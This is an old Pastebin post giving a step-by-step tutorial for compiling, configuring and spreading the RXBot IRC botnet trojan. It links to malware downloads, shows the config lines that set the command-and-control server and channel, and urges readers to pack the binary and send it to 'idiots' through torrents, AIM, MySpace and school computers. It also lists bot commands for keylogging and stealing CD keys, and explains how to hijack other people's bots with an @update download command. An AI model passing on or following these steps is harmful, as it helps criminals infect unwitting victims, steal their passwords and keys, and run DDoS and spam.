Advertisement
Guest User

RXBot Tutorial and Download

a guest
May 26th, 2010
3,634
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.83 KB | None | 0 0
  1. In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:
  2.  
  3. Download
  4. Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.
  5.  
  6. Q:What is a botnet?
  7. A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
  8. Depending on the source you used, the bot can do several things.
  9. I myself have helped write one of the most advanced and secure bot sources out there.
  10. (Off topic)
  11. But once again depending on the source you can :
  12. Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
  13. Once again depending on the bot it may be able to kill other fellow competeter bots.
  14. Or even kill AV/FW apon startup.
  15. Add itself to registry.
  16. Open sites.
  17. Open commands.
  18. Cmd,
  19. notepad,
  20. html,
  21. Anything is possible !
  22.  
  23. Theres the infected computers "bots" the attacker, the server, and the victim.
  24.  
  25. while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
  26.  
  27. Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."
  28.  
  29.  
  30. Botnets are being used for Google Adword click fraud, according to security watchers.
  31.  
  32. Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
  33. ---------------
  34. Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
  35. Download tutorial
  36.  
  37. -----------------------------
  38. Here we go ladies and gentlemen
  39. Follow the tutorial:
  40. -----------------------------
  41.  
  42. I. Setting up the C++ compilier: (easy)
  43.  
  44. 1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb) Or Visual Studio Enterprise 6.0
  45. http://downloads.electroniktribulationarmy.com/Malware/Utilities%20and%20Apps/RX-Win32%20Compiler%20Tools/
  46.  
  47. 2. Install Visual Studio 6.0 Enterprise Edition (295 mb)
  48. http://downloads.electroniktribulationarmy.com/Malware/Utilities%20and%20Apps/RX-Win32%20Compiler%20Tools/Visual_Studio_6.0_Enterprise_Edition.uif
  49.  
  50. 3. Install Platform SDK Server 2003
  51. Also you will need to disable DEP in order for the Platform SDK installer to run, you can thank microsoft for that.
  52.  
  53. Server 2003 Platform SDK (324 mb)
  54. http://downloads.electroniktribulationarmy.com/Malware/Utilities%20and%20Apps/RX-Win32%20Compiler%20Tools/PSDK_FULL_Server_2003.1.zip
  55.  
  56. -------------------------------------
  57.  
  58. II. Configuring the C++ compilier (easy)
  59.  
  60. 1. Open up Microsoft Visual C++ Compilier 6.0
  61. 2. Go to Tools > Options and Click the "Directories" tab
  62. 3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
  63. Quote:
  64. C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
  65. C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
  66. C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
  67. C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
  68.  
  69. 4. Now put them in this order: (use up and down arrows)
  70. (it does not matter whats below those lines)
  71. ---------------------------------------
  72.  
  73. III. Configuring your bot: (easy)
  74.  
  75. 1. Download and unpack:
  76. Rxbot 7.6 (212.3 kb)
  77.  
  78. http://downloads.electroniktribulationarmy.com/Malware/BOTNETS/
  79.  
  80. 2. You should see an Rxbot 7.6 folder
  81. 3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
  82.  
  83. Quote:
  84. Put in quotations:
  85. char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
  86. char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
  87. char serverpass[] = ""; // server password (not usually needed)
  88. char channel[] = "#botz_channel"; // channel that the bot should join
  89. char chanpass[] = "My_channel_pass"; // channel password
  90.  
  91. Optional:
  92. char server2[] = ""; // backup server
  93. char channel2[] = ""; // backup channel
  94. char chanpass2[] = ""; //Backup channel pass
  95.  
  96. -----------------------------------
  97. IV. Building your bot: (very easy)
  98.  
  99. 1. Make sure Microsoft Visual C++ is open
  100. 2. Select "File > Open Workspace"
  101. 3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
  102. 4. Right Click "rBot Files" and click Build:
  103.  
  104. 5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
  105.  
  106. YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
  107. -------------------------------------
  108. Command list
  109. Download Command list
  110.  
  111. Basics:
  112. .login botpassword will login bots
  113. .logout will logout bots
  114. .keylog on will turn keylogger on
  115. .getcdkeys will retrieve cdkeys.
  116. Read command list for more
  117. -----------------------------------
  118. Download mIRC
  119.  
  120. mIRC
  121. Mirror 2 http://downloads.electroniktribulationarmy.com/Malware/
  122. Mirror 3
  123. --------------------------------------------------------------------------------------------
  124. How to secure your bots:
  125.  
  126. Don't be an idiot, it is easy to steal bots. All you need is the irc server address and maybe a key.
  127. To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
  128. and update the channel topic and run:
  129. Quote:
  130. @update http://www.mybot.com...load/SMSPRO.exe 82
  131.  
  132. The http://mybot.com is your bot's download link and the 82 can be any number(s)
  133. Now steal their bots and have them join your channel
  134. To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.
  135.  
  136. To secure your self:
  137.  
  138. It is fairly easy to secure your bots, here is how:
  139.  
  140. 1. When you are in your right click on your chat window and select "Channel Modes"
  141. 2. Make sure these options are checked:
  142.  
  143. This way no one besides you or another op can set the channel topic
  144. Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
  145. __________________
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement